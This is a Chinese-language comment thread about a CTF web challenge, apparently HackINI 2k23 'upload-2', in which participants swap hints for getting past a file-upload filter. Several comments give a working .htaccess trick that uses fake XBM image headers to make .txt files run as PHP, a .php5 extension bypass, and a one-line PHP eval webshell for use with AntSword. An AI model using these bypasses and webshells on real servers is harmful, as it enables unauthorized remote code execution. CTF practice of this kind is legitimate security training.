逆天题目，还是能做

只需要把文件后缀的.php换成.php5即可

题目非常好 不过我有个疑问 为什么我上传的shell木马中的提交参数函数必须是REQUEST还要是大写 我尝试了GET POST都不行 大写是语法只能是大写还是其他原因吗

可以吧，$_GET $_REQUEST 都行，这些属于php函数，就是这个写法

为什么我上传.user.ini文件去连的时候连不上？？

接下面，内容为一句话木马，然后蚁剑连shell.txt的路径即可

上传一个文件名为 ".htaccess"，注意，文件名前面没有任何东西的，文件内容为： #define width 16 #define height 7 <FilesMatch \.txt$> SetHandler application/x-httpd-php </FilesMatch> 然后上传shell.txt，内容为

1、bp抓包上传.htaccess #define width 16 #define height 7 <FilesMatch \.txt$> SetHandler application/x-httpd-php </FilesMatch> 2、上传马 GIF89a <?php @eval($_POST['cmd']); ?>

看了官方wp就知道有多离谱。。https://github.com/Shellmates/HackINI-2k23-public/blob/main/web/upload-2/solve/README.md

后缀php不行，换后缀php5发现容器只允许.php后缀执行命令，使用.htaccess绕过

@jiangbw 做出来了，只能说逆天，.htaccess内容里面必须有#define width 16 #define height 7

@jiangbw 我也一样 直接报错了 是不是环境有问题

@niano.0 .htaccess上传完就跳界面了，那怎么绕过啊

@xjc7580 大佬，怎么做的呀

大佬，再给点提示呗，上传.htaccess与上传的shell不一个目录啊